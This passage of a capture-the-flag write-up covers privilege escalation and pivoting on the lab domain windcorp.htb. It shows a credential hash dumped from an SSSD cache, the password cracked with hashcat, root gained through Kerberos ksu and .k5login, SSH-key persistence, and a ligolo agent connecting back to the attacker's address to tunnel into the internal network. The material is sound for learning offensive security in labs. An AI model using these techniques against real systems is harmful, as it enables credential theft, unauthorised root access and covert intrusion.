PrivEsc

We can open the .ldb file

tdbdump ./var/lib/sss/db/cache_windcorp.htb.ldb

We get the hash for user Ray.Duncan.

echo '$6$nHb338EAa7BAeuR0$MFQjz2.B688LXEDsx035.Nj.CIDbe/u98V3mLrMhDHiAsh89BX9ByXoGzcXnPXQQF/hAj5ajIsm0zB.wg2zX81' > rayd_hash

hashcat rayd_hash /usr/share/wordlists/rockyou.txt

We get our first pair of credentials for the AD. ray.duncan:pantera

We can check the current creds stored for the AD.

webster@webserver:~$ klist
klist: No credentials cache found (filename: /tmp/.cache/krb5cc.7714)

With ray.duncan users password, we can request it.

webster@webserver:~$ kinit ray.duncan
Password for [email protected]: 
webster@webserver:~$ klist
Ticket cache: FILE:/tmp/.cache/krb5cc.7714
Default principal: [email protected]

Valid starting       Expires              Service principal
02/13/2025 03:12:26  02/13/2025 08:12:26  krbtgt/[email protected]
        renew until 02/14/2025 03:12:24

Now, we can run the command ksu to check if we can use his ticket to be root on the linux VM.

webster@webserver:~$ ksu
Authenticated [email protected]
Account root: authorization for [email protected] successful
Changing uid to root (0)
root@webserver:/home/webster#

The reason why it works and we can ssh back in is because this file permits the user ray.duncan:

root@webserver:~# ls -la
total 36
drwx------  5 root root 4096 Aug 18  2022 .
drwxr-xr-x 18 root root 4096 Aug 22  2022 ..
lrwxrwxrwx  1 root root    9 Apr 27  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-rw-r--r--  1 root root   24 Apr 30  2022 .k5login
drwxr-xr-x  3 root root 4096 Apr 26  2022 .local
drwxr-xr-x  4 root root 4096 Apr 27  2022 .npm
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
drwx------  2 root root 4096 Apr 29  2022 .ssh
-rwxr--r--  1 root root   34 Feb 13 03:26 user.txt
root@webserver:~# cat .k5login 
[email protected]

root@webserver:/home/webster# ifconfig
bash: ifconfig: command not found
root@webserver:/home/webster# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:15:5d:10:93:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.100/24 brd 192.168.0.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::215:5dff:fe10:9300/64 scope link 
       valid_lft forever preferred_lft forever

I still don't know the IP of the DC but we can see the FQDN from /etc/krb5.conf and it is hope.windcorp.htb.

webster@webserver:/var/lib/sss$ cat /etc/krb5.conf
[libdefaults]
        default_realm = WINDCORP.HTB

# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true

# The following encryption type specification will be used by MIT Kerberos
# if uncommented.  In general, the defaults in the MIT Kerberos code are
# correct and overriding these specifications only serves to disable new
# encryption types as they are added, creating interoperability problems.
#
# The only time when you might need to uncomment these lines and change
# the enctypes is if you have local software that will break on ticket
# caches containing ticket encryption types it doesn't know about (such as
# old versions of Sun Java).

#       default_tgs_enctypes = des3-hmac-sha1
#       default_tkt_enctypes = des3-hmac-sha1
#       permitted_enctypes = des3-hmac-sha1

# The following libdefaults parameters are only for Heimdal Kerberos.
        fcc-mit-ticketflags = true

[realms]
        WINDCORP.HTB = {
                kdc = hope.windcorp.htb
                admin_server = hope.windcorp.com
                default_domain = windcorp.htb
        }

[domain_realm]
        .windcorp.htb = WINDCORP.HTB
        windcorp.com = WINDCORP.HTB

[appdefaults]
        forwardable = true
                pam = {
                        WINDCORP.HTB = {
                                ignore_k5login = false
                                }
                }

root@webserver:~# ping hope.windcorp.htb
PING hope.windcorp.htb (192.168.0.2) 56(84) bytes of data.
64 bytes from hope.windcorp.htb (192.168.0.2): icmp_seq=1 ttl=128 time=0.331 ms

So 192.168.0.2 is our DC.

Pivoting and Tunneling

Anyways, I want to use this linux VM as our pivot host to the 192.168.0.0/24 network. Simple steps:

On pivot host:

./agent -connect 10.10.16.10:11601 -ignore-cert

Our host:

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

sudo ./proxy -selfcert

session #choose_1

[Agent : root@webserver] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ 00:15:5d:10:93:00              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.0.100/24               │
│ IPv6 Address │ fe80::215:5dff:fe10:9300/64    │
└──────────────┴────────────────────────────────┘

Back on our machine we need to add the route:

sudo ip route add 192.168.0.0/24 dev ligolo

Failed. For some reason it wont work. First, I need to create persistence. I added the public key into .ssh/authorized_key.

I'll try the old proxychains way with ssh -D. So while in SSH session we do ~C to drop into ssh> and then type -D1080.

We do have the credentials to request TGT. Lets create the tunnel and use kinit again to request a ticket to our attack machine. But first we need to configure the /etc/krb5.conf file on our machine. I updated it to:

[libdefaults]
	default_realm = WINDCORP.HTB

[realms]
    WINDCORP.HTB = { 
      kdc = hope.windcorp.htb
    }

[domain_realm]
	.windcorp.htb = WINDCORP.HTB
	windcorp.htb = WINDCORP.HTB

┌──(anonmak9㉿anonmak9)-[/etc]
└─$ proxychains kinit ray.duncan
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  hope.windcorp.htb:88  ...  OK
Password for [email protected]: 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  hope.windcorp.htb:88  ...  OK
                                                                                                                                                                                             
┌──(anonmak9㉿anonmak9)-[/etc]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: [email protected]

Valid starting       Expires              Service principal
2025-02-12 22:25:53  2025-02-13 03:25:53  krbtgt/[email protected]
        renew until 2025-02-13 22:24:47

PreviousEnumeration NextActive Directory

Last updated 10 months ago